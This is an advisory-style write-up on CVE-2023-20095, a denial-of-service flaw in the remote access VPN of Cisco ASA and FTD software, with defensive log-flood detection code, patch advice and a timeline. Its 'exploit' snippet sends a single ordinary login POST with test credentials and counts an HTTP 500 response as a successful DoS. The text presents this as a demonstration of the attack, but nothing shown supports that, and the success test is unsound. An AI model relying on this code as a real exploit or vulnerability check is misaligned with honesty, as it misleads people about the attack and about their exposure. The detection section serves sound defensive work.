The vulnerability with identifier CVE-2023-20095 affects the remote access VPN features of Cisco's Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software, specifically due to improper handling of HTTPS requests. This vulnerability can be exploited by an unauthenticated, remote attacker, ultimately leading to a denial of service (DoS) condition on the affected device.

Exploit Details

The remote VPN vulnerability occurs because of improper handling of HTTPS requests by the affected ASA and FTD software. An attacker could exploit this vulnerability by sending crafted HTTPS requests to an affected system. A successful exploit could allow the attacker to cause resource exhaustion, resulting in a DoS condition.

The following code snippet demonstrates how an attacker might craft an HTTPS request to exploit the vulnerability:

import requests

# Placeholder target; the remote access VPN logon page of the ASA/FTD device.
target_url = "https://<TARGET_IP>/+CSCOE+/logon.html"
# Arbitrary form values; the request itself, not the credentials, is the point.
payload = {"username": "test", "password": "test", "realm": "test"}

# verify=False disables TLS certificate validation (the VPN portal
# commonly presents a self-signed certificate).
response = requests.post(target_url, data=payload, verify=False)

if response.status_code == 500:
    print("Exploit successful, caused a DoS condition on the target device.")
else:
    print("Exploit failed.")

In this example, the attacker sends an HTTPS request containing a payload with arbitrary "username", "password", and "realm" values. If the response received from the target device has an HTTP status code of 500, the script treats this as an indication that the exploit was successful and has caused a DoS condition.
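The defensive counterpart to the request above is watching for floods of requests to the logon endpoint from a single source, combined with a rise in 5xx responses that would signal resource exhaustion. The following is an added example, not code from the original post or from Cisco; it assumes a simplified, constructed "timestamp src_ip method path status" log format rather than the native ASA/FTD syslog format, and the sample lines and IP addresses are constructed.

```python
"""Sliding-window detection of request floods against the ASA/FTD
remote access VPN logon endpoint (added example, constructed data)."""
from collections import defaultdict, deque
from datetime import datetime

# Endpoint used in the request example above.
LOGON_PATH = "/+CSCOE+/logon.html"

# Constructed sample log in a simplified "ts src_ip method path status"
# format. This is NOT the native ASA/FTD syslog format.
SAMPLE_LOG = """\
2023-11-01T18:15:00Z 198.51.100.7 POST /+CSCOE+/logon.html 200
2023-11-01T18:15:01Z 203.0.113.5 POST /+CSCOE+/logon.html 200
2023-11-01T18:15:02Z 203.0.113.5 POST /+CSCOE+/logon.html 200
2023-11-01T18:15:03Z 203.0.113.5 POST /+CSCOE+/logon.html 500
2023-11-01T18:15:04Z 203.0.113.5 POST /+CSCOE+/logon.html 500
2023-11-01T18:15:05Z 203.0.113.5 POST /+CSCOE+/logon.html 500
2023-11-01T18:15:06Z 203.0.113.5 POST /+CSCOE+/logon.html 500
2023-11-01T18:16:30Z 198.51.100.7 GET /+CSCOE+/logon.html 200
"""


def parse_line(line):
    """Split one constructed log line into (datetime, src, method, path, status)."""
    ts, src, method, path, status = line.split()
    return datetime.fromisoformat(ts.replace("Z", "+00:00")), src, method, path, int(status)


def detect_logon_floods(log_text, window_s=60, threshold=5):
    """Return {src_ip: (requests_in_window, 5xx_in_window)} for every source
    that sent more than `threshold` requests to the logon endpoint within
    any `window_s`-second sliding window."""
    recent = defaultdict(deque)  # src -> deque of (timestamp, status) in window
    flagged = {}
    for line in log_text.splitlines():
        ts, src, _method, path, status = parse_line(line)
        if path != LOGON_PATH:
            continue  # only the VPN logon endpoint is of interest here
        q = recent[src]
        q.append((ts, status))
        # Drop entries that have fallen out of the window.
        while (ts - q[0][0]).total_seconds() > window_s:
            q.popleft()
        if len(q) > threshold:
            flagged[src] = (len(q), sum(1 for _, s in q if s >= 500))
    return flagged
```

Running `detect_logon_floods(SAMPLE_LOG)` on the constructed sample flags 203.0.113.5 with six logon requests in the window, four of them answered with a 5xx status.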

Original References

* Cisco Security Advisory
* CVE-2023-20095 | NVD
* Vulnerability Note VU#590639

This vulnerability affects the following Cisco ASA and FTD software versions:

* Cisco Adaptive Security Appliance (ASA) Software - 9.14 and earlier
* Cisco Firepower Threat Defense (FTD) Software - 6.6 and earlier

Solution/Patches

Cisco has released software updates that address this vulnerability in ASA and FTD software. It is highly recommended that the affected devices be updated to the latest software version to mitigate the risk from this vulnerability. The following software updates are available for ASA and FTD:

* Cisco Adaptive Security Appliance (ASA) Software - 9.15 and later
* Cisco Firepower Threat Defense (FTD) Software - 6.7 and later

Conclusion

The CVE-2023-20095 vulnerability in Cisco ASA and FTD software has the potential to cause significant disruption to business operations by allowing an attacker to cause a DoS condition on affected devices. It is essential for organizations utilizing the remote access VPN features of these devices to ensure that their systems are updated with the latest Cisco security patches to protect against this threat.

Timeline

Published on: 11/01/2023 18:15:09 UTC
Last modified on: 01/25/2024 17:15:29 UTC